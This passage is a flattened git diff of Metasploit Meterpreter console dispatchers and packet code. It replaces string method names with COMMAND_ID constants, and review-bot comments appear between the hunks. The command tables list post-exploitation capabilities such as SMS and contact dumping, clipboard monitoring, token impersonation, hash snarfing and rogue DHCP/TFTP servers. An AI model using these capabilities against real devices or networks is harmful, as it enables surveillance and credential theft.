(self.type == PACKET_TYPE_PLAIN_RESPONSE)) + (self.type == PACKET_TYPE_RESPONSE || self.type == PACKET_TYPE_PLAIN_RESPONSE) end ## 
@@ -1404,24 +907,21 @@ def response? # Checks to see if the packet's method is equal to the supplied method. # def method?(method) - method = Rex::Post::Meterpreter.method_string_to_command_id(method) if method.is_a?(String) - return (get_tlv_value(TLV_TYPE_METHOD) == method) + (get_tlv_value(TLV_TYPE_COMMAND_ID) == method) end # # Sets the packet's method TLV to the method supplied. # def method=(method) - method = Rex::Post::Meterpreter.method_string_to_command_id(method) if method.is_a?(String) - add_tlv(TLV_TYPE_METHOD, method, true) + add_tlv(TLV_TYPE_COMMAND_ID, method, true) end # # Returns the value of the packet's method TLV. # def method - method = get_tlv_value(TLV_TYPE_METHOD) - return Rex::Post::Meterpreter.command_id_to_method_string(method) + get_tlv_value(TLV_TYPE_COMMAND_ID) end # @@ -1429,7 +929,7 @@ def method # result. # def result?(result) - return (get_tlv_value(TLV_TYPE_RESULT) == result) + (get_tlv_value(TLV_TYPE_RESULT) == result) end # @@ -1443,14 +943,14 @@ def result=(result) # Gets the value of the packet's result TLV. # def result - return get_tlv_value(TLV_TYPE_RESULT) + get_tlv_value(TLV_TYPE_RESULT) end # # Gets the value of the packet's request identifier TLV. # def rid - return get_tlv_value(TLV_TYPE_REQUEST_ID) + get_tlv_value(TLV_TYPE_REQUEST_ID) end end diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index 46e226962d910..c37c5fdd12ee1 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -246,7 +246,7 @@ def keepalive self.alive = false end else - pkt = Packet.create_request('core_channel_eof') + pkt = Packet.create_request(COMMAND_ID_CORE_CHANNEL_EOF) pkt.add_tlv(TLV_TYPE_CHANNEL_ID, 0) add_response_waiter(pkt, Proc.new { @ping_sent = false }) send_packet(pkt) diff --git a/lib/rex/post/meterpreter/pivot.rb b/lib/rex/post/meterpreter/pivot.rb index ab6abffd1008e..a63a391c02c7f 100644 
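Review bot: `method=` and `method?` no longer validate what they are handed, so a caller that still passes a method string gets a silent `false` from `method?` and an untyped value stored under TLV_TYPE_COMMAND_ID by `method=`, where the removed `method_string_to_command_id` lookup raised ArgumentError. A cheap guard keeps that failure loud while the rest of the tree migrates to the constants: `raise ArgumentError, "command id must be an Integer, got #{method.inspect}" unless method.is_a?(Integer)` as the first line of `method=`, and the same check in `method?`. The comment above `method` still says "method TLV"; it should now read `# Returns the value of the packet's command id TLV.` to match the new name.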
--- a/lib/rex/post/meterpreter/pivot.rb +++ b/lib/rex/post/meterpreter/pivot.rb @@ -46,12 +46,12 @@ class << self # to the appropriate class instance's DIO handler def request_handler(client, packet) handled = false - if packet.method == 'core_pivot_session_new' + if packet.method == COMMAND_ID_CORE_PIVOT_SESSION_NEW handled = true session_guid = packet.get_tlv_value(TLV_TYPE_SESSION_GUID) listener_id = packet.get_tlv_value(TLV_TYPE_PIVOT_ID) client.add_pivot_session(Pivot.new(client, session_guid, listener_id)) - elsif packet.method == 'core_pivot_session_died' + elsif packet.method == COMMAND_ID_CORE_PIVOT_SESSION_DIED handled = true session_guid = packet.get_tlv_value(TLV_TYPE_SESSION_GUID) pivot = client.find_pivot_session(session_guid) @@ -70,7 +70,7 @@ def Pivot.get_listeners(client) def Pivot.remove_listener(client, listener_id) if client.find_pivot_listener(listener_id) - request = Packet.create_request('core_pivot_remove') + request = Packet.create_request(COMMAND_ID_CORE_PIVOT_REMOVE) request.add_tlv(TLV_TYPE_PIVOT_ID, listener_id) client.send_request(request) client.remove_pivot_listener(listener_id) @@ -78,7 +78,7 @@ def Pivot.remove_listener(client, listener_id) end def Pivot.create_named_pipe_listener(client, opts={}) - request = Packet.create_request('core_pivot_add') + request = Packet.create_request(COMMAND_ID_CORE_PIVOT_ADD) request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name]) # TODO: use the framework to generate the whole lot, including a session type diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 488a974e022e6..3b2c020b0d5bd 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb 
@@ -37,20 +37,20 @@ def commands 'wakelock' => 'Enable/Disable Wakelock', } reqs = { - 'dump_sms' => ['android_dump_sms'], - 'dump_contacts' => ['android_dump_contacts'], - 'geolocate' => ['android_geolocate'], - 'dump_calllog' => ['android_dump_calllog'], - 'check_root' => ['android_check_root'], - 'device_shutdown' => ['android_device_shutdown'], - 'send_sms' => ['android_send_sms'], - 'wlan_geolocate' => ['android_wlan_geolocate'], - 'interval_collect' => ['android_interval_collect'], - 'activity_start' => ['android_activity_start'], - 'hide_app_icon' => ['android_hide_app_icon'], - 'sqlite_query' => ['android_sqlite_query'], - 'set_audio_mode' => ['android_set_audio_mode'], - 'wakelock' => ['android_wakelock'], + 'dump_sms' => [COMMAND_ID_ANDROID_DUMP_SMS], + 'dump_contacts' => [COMMAND_ID_ANDROID_DUMP_CONTACTS], + 'geolocate' => [COMMAND_ID_ANDROID_GEOLOCATE], + 'dump_calllog' => [COMMAND_ID_ANDROID_DUMP_CALLLOG], + 'check_root' => [COMMAND_ID_ANDROID_CHECK_ROOT], + 'device_shutdown' => [COMMAND_ID_ANDROID_DEVICE_SHUTDOWN], + 'send_sms' => [COMMAND_ID_ANDROID_SEND_SMS], + 'wlan_geolocate' => [COMMAND_ID_ANDROID_WLAN_GEOLOCATE], + 'interval_collect' => [COMMAND_ID_ANDROID_INTERVAL_COLLECT], + 'activity_start' => [COMMAND_ID_ANDROID_ACTIVITY_START], + 'hide_app_icon' => [COMMAND_ID_ANDROID_HIDE_APP_ICON], + 'sqlite_query' => [COMMAND_ID_ANDROID_SQLITE_QUERY], + 'set_audio_mode' => [COMMAND_ID_ANDROID_SET_AUDIO_MODE], + 'wakelock' => [COMMAND_ID_ANDROID_WAKELOCK], } filter_commands(all, reqs) end @@ -94,7 +94,7 @@ def cmd_interval_collect(*args) return end - type = args.shift.downcase + args.shift.downcase unless client.android.collect_types.include?(opts[:type]) interval_collect_usage diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb index 131b90381d20c..e9dcd629a59ec 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb 
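Review bot: In the `@@ -94,7 +94,7 @@` hunk of cmd_interval_collect, `args.shift.downcase` now discards its result, so `.downcase` does no work beyond raising NoMethodError when `args` is already empty; if the line only exists to consume the sub-command token, `args.shift` alone says so. The next line tests `opts[:type]`, which is presumably populated earlier in the method, outside the hunk, so it is worth confirming that the shifted token was not meant to be that value, since dropping the `type` local suggests it was never read. cmd_interval_collect starts outside the hunk.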
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/appapi.rb @@ -20,16 +20,16 @@ class Console::CommandDispatcher::AppApi # def commands all = { - "app_list" => "List installed apps in the device", - "app_run" => "Start Main Activty for package name", - "app_install" => "Request to install apk file", - "app_uninstall" => "Request to uninstall application" + 'app_list' => 'List installed apps in the device', + 'app_run' => 'Start Main Activty for package name', + 'app_install' => 'Request to install apk file', + 'app_uninstall' => 'Request to uninstall application' } reqs = { - "app_list" => [ "appapi_app_list" ], - "app_run" => [ "appapi_app_run" ], - "app_install" => [ "appapi_app_install" ], - "app_uninstall" => [ "appapi_app_uninstall" ] + 'app_list' => [COMMAND_ID_APPAPI_APP_LIST], + 'app_run' => [COMMAND_ID_APPAPI_APP_RUN], + 'app_install' => [COMMAND_ID_APPAPI_APP_INSTALL], + 'app_uninstall' => [COMMAND_ID_APPAPI_APP_UNINSTALL] } filter_commands(all, reqs) end @@ -38,7 +38,7 @@ def commands # Name for this dispatcher # def name - "Application Controller" + 'Application Controller' end # @@ -46,9 +46,9 @@ def name # def cmd_app_list(*args) app_list_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help Banner" ], - "-u" => [ false, "Get User apps ONLY" ], - "-s" => [ false, "Get System apps ONLY" ] + '-h' => [false, 'Help Banner'], + '-u' => [false, 'Get User apps ONLY'], + '-s' => [false, 'Get System apps ONLY'] ) ret = [] @@ -56,14 +56,14 @@ def cmd_app_list(*args) app_list_opts.parse(args) do |opt, _idx, val| case opt - when "-h" - print_line("Usage: app_list [options]") - print_line("List the installed applications.") + when '-h' + print_line('Usage: app_list [options]') + print_line('List the installed applications.') print_line(app_list_opts.usage) return - when "-u" + when '-u' init = 1 - when "-s" + when '-s' init = 2 end end 
@@ -77,10 +77,10 @@ def cmd_app_list(*args) # def cmd_app_uninstall(*args) if (args.length < 1) - print_error("[-] Usage: app_uninstall ") - print_error("[-] Request to uninstall application.") - print_error("[-] You can use 'app_list' to pick your packagename.") - print_status("ex. app_uninstall com.corrm.clac") + print_error('[-] Usage: app_uninstall ') + print_error('[-] Request to uninstall application.') + print_error('[-] You can use "app_list" to pick your packagename.') + print_status('eg. app_uninstall com.corrm.clac') return end @@ -89,9 +89,9 @@ def cmd_app_uninstall(*args) # Send uninstall request case client.appapi.app_uninstall(package_name) when 1 - print_good("Request Done.") + print_good('Request Done.') when 2 - print_error("File Not Found.") + print_error('File Not Found.') when 11 print_error("package '#{package_name}' not found.") end @@ -102,9 +102,9 @@ def cmd_app_uninstall(*args) # def cmd_app_install(*args) if (args.length < 1) - print_error("[-] Usage: app_install ") - print_error("[-] Request to install application.") - print_status("ex. app_install '/sdcard/Download/corrm.apk'") + print_error('[-] Usage: app_install ') + print_error('[-] Request to install application.') + print_status('eg. app_install "/sdcard/Download/corrm.apk"') return end @@ -113,11 +113,11 @@ def cmd_app_install(*args) # Send install request case client.appapi.app_install(full_path) when 1 - print_good("Request Done.") + print_good('Request Done.') when 2 - print_error("File Not Found.") + print_error('File Not Found.') when 3 - print_error("Root access rejected.") + print_error('Root access rejected.') end end 
@@ -126,10 +126,10 @@ def cmd_app_install(*args) # def cmd_app_run(*args) if (args.length < 1) - print_error("[-] Usage: app_run ") - print_error("[-] Start Main Activty for package name.") - print_error("[-] You can use 'app_list' to pick your packagename.") - print_status("ex. app_run com.corrm.clac") + print_error('[-] Usage: app_run ') + print_error('[-] Start Main Activty for package name.') + print_error('[-] You can use "app_list" to pick your packagename.') + print_status('eg. app_run com.corrm.clac') return end @@ -147,7 +147,7 @@ def cmd_app_run(*args) # Function to help printing list of informations # def to_table(data) - column_headers = [ "Name", "Package", "Running", "IsSystem" ] + column_headers = ['Name', 'Package', 'Running', 'IsSystem'] opts = { 'Header' => 'Application List', @@ -158,9 +158,9 @@ def to_table(data) tbl = Rex::Text::Table.new(opts) (0 ... data.length).step(4).each do |index| tbl << [data[index], - (data[index + 1] == nil ? "" : data[index + 1]), - (data[index + 2] == nil ? "" : data[index + 2]), - (data[index + 3] == nil ? "" : data[index + 3])] + (data[index + 1] == nil ? '' : data[index + 1]), + (data[index + 2] == nil ? '' : data[index + 2]), + (data[index + 3] == nil ? '' : data[index + 3])] end tbl diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb index b2efb5f01e94e..85cf9eb02f701 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb @@ -29,8 +29,6 @@ def initialize(shell) # def commands { - # "dev_image" => "Attempt to grab a frame from webcam", - # "dev_audio" => "Attempt to record microphone audio", "screengrab" => "Attempt to grab screen shot from process's active desktop" } end 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb index 326c837d3fedf..42d8278ab4c9a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb @@ -54,7 +54,7 @@ def commands # Name for this dispatcher # def name - "Extended API Extension" + 'Extended API Extension' end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb index 1dcbcd47e578c..d5a033673c663 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb @@ -34,12 +34,12 @@ def commands 'adsi_domain_query' => 'Enumerate all objects on the specified domain that match a filter.' } reqs = { - "adsi_user_enum" => [ "extapi_adsi_domain_query" ], - "adsi_group_enum" => [ "extapi_adsi_domain_query" ], - "adsi_nested_group_user_enum" => [ "extapi_adsi_domain_query" ], - "adsi_computer_enum" => [ "extapi_adsi_domain_query" ], - "adsi_dc_enum" => [ "extapi_adsi_domain_query" ], - "adsi_domain_query" => [ "extapi_adsi_domain_query" ], + 'adsi_user_enum' => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY], + 'adsi_group_enum' => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY], + 'adsi_nested_group_user_enum' => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY], + 'adsi_computer_enum' => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY], + 'adsi_dc_enum' => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY], + 'adsi_domain_query' => [COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY], } filter_commands(all, reqs) end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb index 511afb7489875..0c6bb159b83fb 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb 
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb 
@@ -21,24 +21,24 @@ class Console::CommandDispatcher::Extapi::Clipboard # def commands all = { - "clipboard_get_data" => "Read the target's current clipboard (text, files, images)", - "clipboard_set_text" => "Write text to the target's clipboard", - "clipboard_monitor_start" => "Start the clipboard monitor", - "clipboard_monitor_pause" => "Pause the active clipboard monitor", - "clipboard_monitor_resume" => "Resume the paused clipboard monitor", - "clipboard_monitor_dump" => "Dump all captured clipboard content", - "clipboard_monitor_purge" => "Delete all captured clipboard content without dumping it", - "clipboard_monitor_stop" => "Stop the clipboard monitor" + 'clipboard_get_data' => "Read the target's current clipboard (text, files, images)", + 'clipboard_set_text' => "Write text to the target's clipboard", + 'clipboard_monitor_start' => 'Start the clipboard monitor', + 'clipboard_monitor_pause' => 'Pause the active clipboard monitor', + 'clipboard_monitor_resume' => 'Resume the paused clipboard monitor', + 'clipboard_monitor_dump' => 'Dump all captured clipboard content', + 'clipboard_monitor_purge' => 'Delete all captured clipboard content without dumping it', + 'clipboard_monitor_stop' => 'Stop the clipboard monitor' } reqs = { - "clipboard_get_data" => [ "extapi_clipboard_get_data" ], - "clipboard_set_text" => [ "extapi_clipboard_set_data" ], - "clipboard_monitor_start" => [ "extapi_clipboard_monitor_start" ], - "clipboard_monitor_pause" => [ "extapi_clipboard_monitor_pause" ], - "clipboard_monitor_resume" => [ "extapi_clipboard_monitor_resume" ], - "clipboard_monitor_dump" => [ "extapi_clipboard_monitor_dump" ], - "clipboard_monitor_purge" => [ "extapi_clipboard_monitor_purge" ], - "clipboard_monitor_stop" => [ "extapi_clipboard_monitor_stop" ], + 'clipboard_get_data' => [COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA], + 'clipboard_set_text' => [COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA], + 'clipboard_monitor_start' => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START], + 
'clipboard_monitor_pause' => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE], + 'clipboard_monitor_resume' => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME], + 'clipboard_monitor_dump' => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP], + 'clipboard_monitor_purge' => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE], + 'clipboard_monitor_stop' => [COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP], } filter_commands(all, reqs) end @@ -47,7 +47,7 @@ def commands # Name for this dispatcher # def name - "Extapi: Clipboard Management" + 'Extapi: Clipboard Management' end # diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb index 9b4de4032b3f7..ba5c600024b53 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb @@ -22,14 +22,14 @@ class Console::CommandDispatcher::Extapi::Service # def commands all = { - "service_enum" => "Enumerate all registered Windows services", - "service_query" => "Query more detail about a specific Windows service", - "service_control" => "Control a single service (start/pause/resume/stop/restart)" + 'service_enum' => 'Enumerate all registered Windows services', + 'service_query' => 'Query more detail about a specific Windows service', + 'service_control' => 'Control a single service (start/pause/resume/stop/restart)' } reqs = { - "service_enum" => [ "extapi_service_enum" ], - "service_query" => [ "extapi_service_query" ], - "service_control" => [ "extapi_service_control" ], + 'service_enum' => [COMMAND_ID_EXTAPI_SERVICE_ENUM], + 'service_query' => [COMMAND_ID_EXTAPI_SERVICE_QUERY], + 'service_control' => [COMMAND_ID_EXTAPI_SERVICE_CONTROL], } filter_commands(all, reqs) end 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
index 2cdf06abafe77..1dfab3938d441 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb
@@ -3,132 +3,133 @@ require 'rex/post/meterpreter' module Rex - module Post - module Meterpreter - module Ui - ### - # - # Extended API window management user interface. - # - ### - class Console::CommandDispatcher::Extapi::Window - - Klass = Console::CommandDispatcher::Extapi::Window - - include Console::CommandDispatcher - - # - # List of supported commands. - # - def commands - all = { - 'window_enum' => 'Enumerate all current open windows' - } - reqs = { - 'window_enum' => [ 'extapi_window_enum' ] - } - filter_commands(all, reqs) - end - - # - # Name for this dispatcher - # - def name - 'Extapi: Window Management' - end - - # - # Options for the window_enum command. - # - @@window_enum_opts = Rex::Parser::Arguments.new( - '-h' => [ false, 'Help banner' ], - '-p' => [ true, 'Parent window handle, used to enumerate child windows' ], - '-u' => [ false, 'Include unknown/untitled windows in the result set' ], - '-c' => [ true, 'Specify the window class name to display. e.g. Edit,Button etc.' ] - ) - - def window_enum_usage - print( - "\nUsage: window_enum [-h] [-p parent_window] [-u]\n\n" \ - "Enumerate the windows on the target.\n\n" \ - "Enumeration returns the Process ID and Window Handle for each window\n" \ - "found. The Window Handle can be used for further calls to window_enum\n" \ - "or the railgun API.\n" + - @@window_enum_opts.usage + - "Note: Not all windows can be enumerated. An attempt to enumerate\n" \ - " the children of such a window will result in a failure with the\n" \ - " message \"Operation failed: The parameter is incorrect.\"\n"\ - " Enumerable maximum text length is 256.\n\n" - ) - end - - # - # Enumerate top-level windows. 
- # - def cmd_window_enum(*args) - parent_window = nil - include_unknown = false - window_class_name = nil - - @@window_enum_opts.parse(args) do |opt, _idx, val| - case opt - when '-u' - include_unknown = true - when '-p' - parent_window = val.to_i - if parent_window == 0 - window_enum_usage - return true - end - when '-h' - window_enum_usage - return true - when '-c' - window_class_name = val.to_s - if window_class_name == '' - window_enum_usage - return true - end - end - end - - windows = client.extapi.window.enumerate(include_unknown, parent_window) - - header = parent_window ? "Child windows of #{parent_window}" : 'Top-level windows' - columns = [ 'PID', 'Handle', 'ClassName', 'Title'] - table = Rex::Text::Table.new( - 'Header' => header, - 'Indent' => 0, - 'SortIndex' => columns.index('Handle'), - 'Columns' => columns - ) - - windows.each do |w| - if window_class_name.nil? - table << [w[:pid], w[:handle], w[:class_name], w[:title]] - elsif (w[:class_name] == window_class_name) - table << [w[:pid], w[:handle], w[:class_name], w[:title]] - else - next - end - end - - print_line - print_line(table.to_s) - - if parent_window.nil? - print_line("Total top-level Windows: #{windows.length}") - else - print_line("Total child Windows: #{windows.length}") - end - - print_line - - return true - end +module Post +module Meterpreter +module Ui + +### +# +# Extended API window management user interface. +# +### +class Console::CommandDispatcher::Extapi::Window + + Klass = Console::CommandDispatcher::Extapi::Window + + include Console::CommandDispatcher + + # + # List of supported commands. + # + def commands + all = { + 'window_enum' => 'Enumerate all current open windows' + } + reqs = { + 'window_enum' => [COMMAND_ID_EXTAPI_WINDOW_ENUM] + } + filter_commands(all, reqs) + end + + # + # Name for this dispatcher + # + def name + 'Extapi: Window Management' + end + + # + # Options for the window_enum command. 
+ # + @@window_enum_opts = Rex::Parser::Arguments.new( + '-h' => [ false, 'Help banner' ], + '-p' => [ true, 'Parent window handle, used to enumerate child windows' ], + '-u' => [ false, 'Include unknown/untitled windows in the result set' ], + '-c' => [ true, 'Specify the window class name to display. e.g. Edit,Button etc.' ] + ) + + def window_enum_usage + print( + "\nUsage: window_enum [-h] [-p parent_window] [-u]\n\n" \ + "Enumerate the windows on the target.\n\n" \ + "Enumeration returns the Process ID and Window Handle for each window\n" \ + "found. The Window Handle can be used for further calls to window_enum\n" \ + "or the railgun API.\n" + + @@window_enum_opts.usage + + "Note: Not all windows can be enumerated. An attempt to enumerate\n" \ + " the children of such a window will result in a failure with the\n" \ + " message \"Operation failed: The parameter is incorrect.\"\n"\ + " Enumerable maximum text length is 256.\n\n" + ) + end + # + # Enumerate top-level windows. + # + def cmd_window_enum(*args) + parent_window = nil + include_unknown = false + window_class_name = nil + + @@window_enum_opts.parse(args) do |opt, _idx, val| + case opt + when '-u' + include_unknown = true + when '-p' + parent_window = val.to_i + if parent_window == 0 + window_enum_usage + return true + end + when '-h' + window_enum_usage + return true + when '-c' + window_class_name = val.to_s + if window_class_name == '' + window_enum_usage + return true end end end + + windows = client.extapi.window.enumerate(include_unknown, parent_window) + + header = parent_window ? "Child windows of #{parent_window}" : 'Top-level windows' + columns = [ 'PID', 'Handle', 'ClassName', 'Title'] + table = Rex::Text::Table.new( + 'Header' => header, + 'Indent' => 0, + 'SortIndex' => columns.index('Handle'), + 'Columns' => columns + ) + + windows.each do |w| + if window_class_name.nil? 
+ table << [w[:pid], w[:handle], w[:class_name], w[:title]] + elsif (w[:class_name] == window_class_name) + table << [w[:pid], w[:handle], w[:class_name], w[:title]] + else + next + end + end + + print_line + print_line(table.to_s) + + if parent_window.nil? + print_line("Total top-level Windows: #{windows.length}") + else + print_line("Total child Windows: #{windows.length}") + end + + print_line + + return true end + +end +end +end +end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb index 7b6c7f57a8744..f7159672a406f 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb @@ -26,10 +26,10 @@ class Console::CommandDispatcher::Extapi::Wmi # def commands all = { - "wmi_query" => "Perform a generic WMI query and return the results", + 'wmi_query' => 'Perform a generic WMI query and return the results', } reqs = { - "wmi_query" => [ "extapi_wmi_query" ], + 'wmi_query' => [COMMAND_ID_EXTAPI_WMI_QUERY], } filter_commands(all, reqs) end @@ -38,7 +38,7 @@ def commands # Name for this dispatcher # def name - "Extapi: WMI Querying" + 'Extapi: WMI Querying' end # diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb index 921d176e9a070..4a8af5f424c2e 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb 
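Review bot: The re-indented body drops the blank line that separated `window_enum_usage` from the comment block of `cmd_window_enum` (`+ end` is followed directly by `+ #`), unlike every other method boundary in the class; restoring it keeps the hunk a pure re-indent plus the `COMMAND_ID_EXTAPI_WINDOW_ENUM` swap. On the new side the `windows.each` filter duplicates the `table <<` line across two branches and ends in `else next`; it reads more directly as `next unless window_class_name.nil? || w[:class_name] == window_class_name` followed by the single `table << [w[:pid], w[:handle], w[:class_name], w[:title]]`.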
@@ -29,12 +29,12 @@ def initialize(shell) # def commands { - "add_user" => "Attempt to add a user with all tokens", - "add_localgroup_user" => "Attempt to add a user to a local group with all tokens", - "add_group_user" => "Attempt to add a user to a global group with all tokens", - "list_tokens" => "List tokens available under current user context", - "impersonate_token" => "Impersonate specified token", - "snarf_hashes" => "Snarf challenge/response hashes for every token" + 'add_user' => 'Attempt to add a user with all tokens', + 'add_localgroup_user' => 'Attempt to add a user to a local group with all tokens', + 'add_group_user' => 'Attempt to add a user to a global group with all tokens', + 'list_tokens' => 'List tokens available under current user context', + 'impersonate_token' => 'Impersonate specified token', + 'snarf_hashes' => 'Snarf challenge/response hashes for every token' } end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb index bc6369800ef27..f0ccb91efb95e 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb 
@@ -22,20 +22,20 @@ class Console::CommandDispatcher::Lanattacks::Dhcp # def commands all = { - "dhcp_start" => "Start the DHCP server", - "dhcp_stop" => "Stop the DHCP server", - "dhcp_reset" => "Reset the DHCP server", - "dhcp_set_option" => "Set a DHCP server option", - "dhcp_load_options" => "Load DHCP optionis from a datastore", - "dhcp_log" => "Log DHCP server activity" + 'dhcp_start' => 'Start the DHCP server', + 'dhcp_stop' => 'Stop the DHCP server', + 'dhcp_reset' => 'Reset the DHCP server', + 'dhcp_set_option' => 'Set a DHCP server option', + 'dhcp_load_options' => 'Load DHCP optionis from a datastore', + 'dhcp_log' => 'Log DHCP server activity' } reqs = { - "dhcp_start" => [ "lanattacks_start_dhcp" ], - "dhcp_stop" => [ "lanattacks_stop_dhcp" ], - "dhcp_reset" => [ "lanattacks_reset_dhcp" ], - "dhcp_set_option" => [ "lanattacks_set_dhcp_option" ], - "dhcp_load_options" => [ "lanattacks_set_dhcp_option" ], - "dhcp_log" => [ "lanattacks_dhcp_log" ] + 'dhcp_start' => [COMMAND_ID_LANATTACKS_START_DHCP], + 'dhcp_stop' => [COMMAND_ID_LANATTACKS_STOP_DHCP], + 'dhcp_reset' => [COMMAND_ID_LANATTACKS_RESET_DHCP], + 'dhcp_set_option' => [COMMAND_ID_LANATTACKS_SET_DHCP_OPTION], + 'dhcp_load_options' => [COMMAND_ID_LANATTACKS_SET_DHCP_OPTION], + 'dhcp_log' => [COMMAND_ID_LANATTACKS_DHCP_LOG] } filter_commands(all, reqs) end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb index beb69a1d020b6..5c18d05956ec5 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb 
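Review bot: The new side keeps the typo in the user-visible description of `dhcp_load_options`; since the hunk already rewrites every line of the hash, the line should read `'dhcp_load_options' => 'Load DHCP options from a datastore'`. `dhcp_load_options` and `dhcp_set_option` both map to `COMMAND_ID_LANATTACKS_SET_DHCP_OPTION`, which matches the old string mapping, so that appears intentional and is only worth a short comment if it is.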
@@ -22,16 +22,16 @@ class Console::CommandDispatcher::Lanattacks::Tftp # def commands all = { - "tftp_start" => "Start the TFTP server", - "tftp_stop" => "Stop the TFTP server", - "tftp_reset" => "Reset the TFTP server", - "tftp_add_file" => "Add a file to the TFTP server" + 'tftp_start' => 'Start the TFTP server', + 'tftp_stop' => 'Stop the TFTP server', + 'tftp_reset' => 'Reset the TFTP server', + 'tftp_add_file' => 'Add a file to the TFTP server' } reqs = { - "tftp_start" => [ "lanattacks_start_tftp" ], - "tftp_stop" => [ "lanattacks_stop_tftp" ], - "tftp_reset" => [ "lanattacks_reset_tftp" ], - "tftp_add_file" => [ "lanattacks_add_tftp_file" ], + 'tftp_start' => [COMMAND_ID_LANATTACKS_START_TFTP], + 'tftp_stop' => [COMMAND_ID_LANATTACKS_STOP_TFTP], + 'tftp_reset' => [COMMAND_ID_LANATTACKS_RESET_TFTP], + 'tftp_add_file' => [COMMAND_ID_LANATTACKS_ADD_TFTP_FILE], } filter_commands(all, reqs) end @@ -40,7 +40,7 @@ def commands # Name for this dispatcher. # def name - "Lanattacks: TFTP" + 'Lanattacks: TFTP' end @@tftp_start_opts = Rex::Parser::Arguments.new( diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb index 25db17ae41594..5782aed2d272a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb @@ -38,8 +38,8 @@ def initialize(shell) # def commands { - "networkpug_start" => "Start slinging packets between hosts", - "networkpug_stop" => "Stop slinging packets between hosts", + 'networkpug_start' => 